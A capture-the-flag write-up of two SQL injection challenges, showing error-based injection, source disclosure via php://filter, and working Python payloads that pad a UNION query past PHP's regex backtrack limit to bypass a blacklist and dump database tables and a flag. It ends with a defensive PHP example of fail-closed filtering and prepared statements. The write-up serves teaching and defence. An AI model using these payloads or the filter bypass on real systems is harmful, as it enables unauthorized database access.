WRONG_SQL
After getting in, I registered and logged in with an arbitrary account and clicked Show, which revealed:
Once again there is an id=1 parameter, a likely injection point, so I started testing.
Entering a single quote echoes a database error.
union, sleep, spaces (which can be bypassed with inline comments /**/) and so on are all filtered.
Because the error from the single quote is displayed directly, the flag can be obtained through error-based injection.
Dump the database name
(first half of the database name) (second half of the database name)
Dump the table names of z3333333
Dump the column names of 3333333z
After dumping the data I found half of the flag, then found the other half.
Got flag{87f495c71c00b93b777061fe1ff704f2}
EZSQL
Key points: the php://filter pseudo-protocol, regex backtracking
First, seeing url?file=list on the list page brings the pseudo-protocol to mind.
http://das.wetolink.com:44006/file.php?file=php://filter/read=convert.base64-encode/resource=list
This returns a base64-encoded string.
Decoding it gives the source code:
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<link rel="icon" href="./bootstrap-4.0.0/favicon.ico">
<title>ezsql</title>
<!-- Bootstrap core CSS -->
<link href="./bootstrap-4.0.0/dist/css/bootstrap.min.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="starter-template.css" rel="stylesheet">
</head>
<body>
<nav class="navbar navbar-expand-md navbar-dark bg-dark fixed-top">
<a class="navbar-brand" href="#">ezsql</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExampleDefault" aria-controls="navbarsExampleDefault" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarsExampleDefault">
<ul class="navbar-nav mr-auto">
<li class="nav-item">
<a class="nav-link" href="./index.php">Home</a>
</li>
<li class="nav-item active">
<a class="nav-link" href="./file.php?file=list">List<span class="sr-only">(current)</span></a>
</li>
<div class="dropdown-menu" aria-labelledby="dropdown01">
<a class="dropdown-item" href="#">Action</a>
<a class="dropdown-item" href="#">Another action</a>
<a class="dropdown-item" href="#">Something else here</a>
</div>
</ul>
</div>
</nav>
<main role="main" class="container">
<div class="starter-template">
<h1>ezsql</h1>
<p class="lead">
<?php include("sql.php")?>
</p>
</div>
</main><!-- /.container -->
<!-- Bootstrap core JavaScript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script>window.jQuery || document.write('<script src="./bootstrap-4.0.0/assets/js/vendor/jquery-slim.min.js"><\/script>')</script>
<script src="./bootstrap-4.0.0/assets/js/vendor/popper.min.js"></script>
<script src="./bootstrap-4.0.0/dist/js/bootstrap.min.js"></script>
</body>
</html>
It contains <?php include("sql.php")?>
Building the same pseudo-protocol request again for sql gives its base64-encoded source:
<?php
error_reporting(0);
include("config.php");
$id=isset($_POST['id']) ? $_POST['id'] : 1;
// Blacklist check. preg_match() returns 0 on no match, but false on an error such as
// exceeding pcre.backtrack_limit; both are falsy, so an error skips the die() below.
if(preg_match('/UNION.+?SELECT|\/\*.*\*\/|sleep|and|if|&&|\|\||\^|%|ascii|mid|left|greatest|least|substr|=|-|<|>|benchmark|like|in|between|regexp/is', $id)) {
die('SQL Injection');
}
mysqli_query($conn,"set names utf8");
$sql="select * from `ctf` where id ='".$id."'";
$result=mysqli_query($conn,$sql);
$row=mysqli_fetch_row($result);
if($id==1)
{
echo "<img src='./img/1.png'><br>";
}
else if($id==2)
{
echo"<img src='./img/2.jpg'><br>";
}
else if($id==3)
{
echo"<img src='./img/3.jpg'><br>";
}
else
{
echo "what do you do?";
}
echo " <p class=\"lead\">
{$row[1]}
</p>
<p class=\"lead\">
{$row[2]}
</p>
"
?>
There is a regex filter in the middle; if it can be bypassed, the SQL injection can be carried out.
This is the PHP trick of using the PCRE backtracking-count limit (pcre.backtrack_limit) to bypass a security check: when the limit is exceeded, preg_match() returns false instead of 0, and the if() treats false as "no match".
We can bypass it by inserting more junk characters than the limit allows.
import requests
url='http://das.wetolink.com:44006/sql.php'
response=requests.request("POST",url,data={"id":"0'union/*"+"a"*100000+"*/select 1,version(),3#"})
print(response.text)
The response:
So the same method can be used for the other operations.
Dump the databases:
response=requests.request("POST",url,data={"id":"0'union/*"+"a"*100000+"*/select 1,version(),3#"})
Got information_schema,ctf,mysql,test
Dump the table names:
response=requests.request("POST",url,data={"id":"0'union/*"+"a"*100000+"*/select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctf'#"})
Got cat,flag
Dump the column names:
response=requests.request("POST",url,data={"id":"0'union/*"+"a"*100000+"*/select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctf' and table_name='flag'#"})
Got id,flag
Read the column contents:
response=requests.request("POST",url,data={"id":"0'union/*"+"a"*100000+"*/select 1,group_concat(flag),3 from ctf.flag#"})
Got the flag.
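The root cause in sql.php is that the filter fails open: preg_match() returns false (an error) rather than 0 when the backtrack limit is hit, and if(preg_match(...)) cannot tell the two apart. The following is an added example (not the challenge's code) showing the fail-open check next to a fail-closed version and a prepared-statement lookup; it lowers pcre.backtrack_limit and disables pcre.jit via ini_set so the error is reproduced with a small input, and preg_last_error_msg() requires PHP 8.0 or later.

```php
<?php
// Added example: why `if (preg_match(...))` fails open, and how to fail closed.
// BLACKLIST is the challenge's pattern; everything else is constructed for this demo.
const BLACKLIST = '/UNION.+?SELECT|\/\*.*\*\/|sleep|and|if|&&|\|\||\^|%|ascii|mid|left|greatest|least|substr|=|-|<|>|benchmark|like|in|between|regexp/is';

// Original logic: preg_match() returning 0 (no match) OR false (error) lets input through.
function filter_fail_open(string $id): bool {
    return (bool) preg_match(BLACKLIST, $id);   // true means "blocked"
}

// Fail-closed: only an explicit 0 with no PCRE error passes; any error blocks and is logged,
// so a backtrack-limit event becomes a detectable signal instead of a silent bypass.
function filter_fail_closed(string $id): bool {
    $r = preg_match(BLACKLIST, $id);
    if ($r === false || preg_last_error() !== PREG_NO_ERROR) {
        error_log('preg_match failed, blocking request: ' . preg_last_error_msg());
        return true;
    }
    return $r === 1;
}

// Actual fix: the column is numeric, so whitelist digits and bind the value as an integer.
// A blacklist regex is not needed at all once the query is parameterised.
function lookup(mysqli $conn, string $id): ?array {
    if (!ctype_digit($id)) {
        return null;
    }
    $n = (int) $id;
    $stmt = $conn->prepare('SELECT * FROM `ctf` WHERE id = ?');
    $stmt->bind_param('i', $n);
    $stmt->execute();
    return $stmt->get_result()->fetch_row() ?: null;
}

// Demo: shrink the backtrack limit and turn off JIT (which enforces its own limits, so the
// behaviour differs with pcre.jit=1) so a 5000-byte filler reproduces the writeup's error.
ini_set('pcre.jit', '0');
ini_set('pcre.backtrack_limit', '1000');
$payload = "0'union/*" . str_repeat('a', 5000) . "*/select 1,2,3#";  // constructed input

// When the limit is exhausted preg_match() returns false and preg_last_error() reports
// PREG_BACKTRACK_LIMIT_ERROR; the fail-open check then treats the input as clean.
var_dump(preg_match(BLACKLIST, $payload));
echo preg_last_error_msg(), PHP_EOL;
var_dump(filter_fail_open($payload));    // original check: not blocked
var_dump(filter_fail_closed($payload));  // hardened check: blocked
```

Outside the demo, leave pcre.backtrack_limit at its default and rely on lookup(): the limits exist to stop runaway regexes, and no value of them makes a blacklist a substitute for parameterised queries.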